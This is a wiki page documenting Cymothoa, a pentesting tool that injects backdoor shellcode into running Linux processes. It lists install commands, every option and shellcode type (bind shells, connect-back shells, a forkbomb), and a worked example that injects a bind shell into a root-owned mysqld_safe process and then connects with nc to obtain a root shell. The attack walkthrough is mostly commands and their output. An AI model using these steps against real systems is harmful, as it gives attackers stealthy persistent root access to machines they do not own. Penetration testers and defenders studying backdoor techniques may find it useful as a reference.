Cymothoa

From aldeid
Jump to: navigation, search

Description

Cymothoa is a stealth backdooring tool, that inject backdoor's shellcode into an existing process.

Installation

Backtrack

Backtrack 5 R2 already comes with Cymothoa installed, in /pentest/backdoors/cymothoa/.

From scratch

$ cd ~/src/
$ wget http://downloads.sourceforge.net/project/cymothoa/cymothoa-1-beta/cymothoa-1-beta.tar.gz
$ tar xzvf cymothoa-1-beta.tar.gz
$ cd cymothoa-1-beta/
$ make
$ sudo make install

Usage

Syntax

cymothoa -p <pid> -s <shellcode_number> [options]

Options

Main options

-p
process pid
-s
shellcode number
0 - bind /bin/sh to the provided port (requires -y)
1 - bind /bin/sh + fork() to the provided port (requires -y) - izik <[email protected]>
2 - bind /bin/sh to tcp port with password authentication (requires -y -o)
3 - /bin/sh connect back (requires -x, -y)
4 - tcp socket proxy (requires -x -y -r) - Russell Sanford ([email protected])
5 - script execution (see the payload), creates a tmp file you must remove
6 - forks an HTTP Server on port tcp/8800 - http://xenomuta.tuxfamily.org/
7 - serial port busybox binding - [email protected] [email protected]
8 - forkbomb (just for fun...) - Kris Katterjohn
9 - open cd-rom loop (follows /dev/cdrom symlink) - [email protected]
10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs ([email protected])
11 - POC alarm() scheduled shellcode
12 - POC setitimer() scheduled shellcode
13 - alarm() backdoor (requires -j -y) bind port, fork on accept
14 - setitimer() tail follow (requires -k -x -y) send data via upd
-l
memory region name for shellcode injection (default /lib/ld)
search for "r-xp" permissions, see /proc/pid/maps...
-m
memory region name for persistent memory (default /lib/ld)
search for "rw-p" permissions, see /proc/pid/maps...
-h
print this help screen
-S
list available shellcodes

Injection options (overwrite payload flags)

-f
fork parent process
-F
don't fork parent process
-b
create payload thread (probably you need also -F)
-B
don't create payload thread
-w
pass persistent memory address
-W
don't pass persistent memory address
-a
use alarm scheduler
-A
don't use alarm scheduler
-t
use setitimer scheduler
-T
don't use setitimer scheduler

Payload arguments

-j
set timer (seconds)
-k
set timer (microseconds)
-x
set the IP
-y
set the port number
-r
set the port number 2
-z
set the username (4 bytes)
-o
set the password (8 bytes)
-c
set the script code (ex: "#!/bin/sh\nls; exit 0")
escape codes will not be interpreted

Usage

First install cymothoa on the victim's computer. Then check the process ID you want to infect (e.g. mysql, PID=1155)

victim:~/src/cymothoa-1-beta# ps aux | grep mysql
root      1155  0.0  0.1   1752   568 ?        S    21:39   0:00 /bin/sh /usr/bin/mysqld_safe
mysql     1273  0.0  4.3 138744 22424 ?        Sl   21:39   0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
root      1274  0.0  0.1   1676   560 ?        S    21:39   0:00 logger -t mysqld -p daemon.error
root     26975  0.0  0.1   3324   812 pts/0    S+   21:53   0:00 grep mysql

Then infect the process:

victim:~/src/cymothoa-1-beta# ./cymothoa -p 1155 -s 0 -y 6666
[+] attaching to process 1155

 register info: 
 -----------------------------------------------------------
 eax value: 0xfffffe00	 ebx value: 0xffffffff
 esp value: 0xbfbfaffc	 eip value: 0xb7818424
 ------------------------------------------------------------

[+] new esp: 0xbfbfaff8
[+] payload preamble: fork
[+] injecting code into 0xb7819000
[+] copy general purpose registers
[+] detaching from 1155

[+] infected!!!

On the attacker's machine, you should now be able to connect to port 6666:

[email protected]:/pentest/backdoors/cymothoa# nc 192.168.1.18 6666
id
uid=0(root) gid=0(root) groups=0(root)

Comments

blog comments powered by Disqus